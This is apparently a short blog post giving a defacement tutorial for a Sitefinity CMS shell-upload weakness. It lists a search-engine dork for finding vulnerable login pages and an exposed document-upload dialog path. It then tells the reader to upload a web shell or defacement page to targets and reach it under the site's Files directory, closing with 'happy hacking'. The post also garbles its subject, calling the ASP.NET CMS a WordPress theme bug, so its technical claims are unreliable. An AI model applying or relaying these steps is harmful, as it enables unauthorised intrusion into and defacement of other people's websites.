Exploit Tutorial deface with Sitefinity CMS (ASP.NET) Shell Upload Vulnerability..Sitefinity CMS is a bug that exist in CMS WordPress theme..
here we godork: inurl:"/Sitefinity/login.aspx
exploit: /sitefinity/UserControls/ Dialogs/DocumentEditorDialog.aspx
Vulnerability ~ Appears in Upload Form like this image
Then upload your shell or your deface page..
If successful uploaded the file name will
appear
Now your Shell/File Access >will be like this www.target.com/Files/file.aspx or www.target.com/Files/file.html e.t.c..
Thats all, happy hacking....
No comments:
Post a Comment